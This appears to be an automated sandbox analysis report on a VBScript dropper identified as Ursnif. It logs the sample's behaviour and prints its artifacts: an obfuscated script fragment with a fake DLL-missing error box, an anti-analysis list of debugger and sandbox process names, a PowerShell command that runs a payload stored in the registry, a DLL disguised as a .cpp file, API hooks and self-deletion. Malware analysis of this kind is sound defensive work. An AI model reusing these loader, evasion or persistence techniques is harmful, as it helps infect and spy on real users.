Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E52102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 21_2_00E52102
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{DE70903F-A522-C073-1FF2-A9F4C346ED68}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{965F7604-FD91-382B-372A-81EC5BFE45E0}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2424:120:WilError_01
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{BA6EB6AE-D1AE-FC19-2B8E-95F08FA29924}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{5AA57996-F134-9CA9-4B2E-B590AF42B9C4}
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: 345678.vbs Static file information: File size 1397341 > 1048576
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdb@ source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdbXP+s source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000001.00000003.535291067.000001763BDE4000.00000004.00000001.sdmp, fum.cpp.1.dr
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E57AB0 push ecx; ret 21_2_00E57AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E57E1F push ecx; ret 21_2_00E57E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055876C0 push ss; ret 21_2_055876C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05594EE0 push ecx; ret 21_2_05594EE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0559528F push ecx; ret 21_2_0559529F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3DC6E9 push 3B000001h; retf 31_2_000002174F3DC6EE
Source: C:\Windows\System32\control.exe Code function: 38_2_000BC6E9 push 3B000001h; retf 38_2_000BC6EE
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ABC6E9 push 3B000001h; retf 40_2_00000195D8ABC6EE
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05585529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 21_2_05585529
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline' Jump to behavior

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\345678.vbs Jump to behavior
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Stores large binary data to the registry
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDate Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
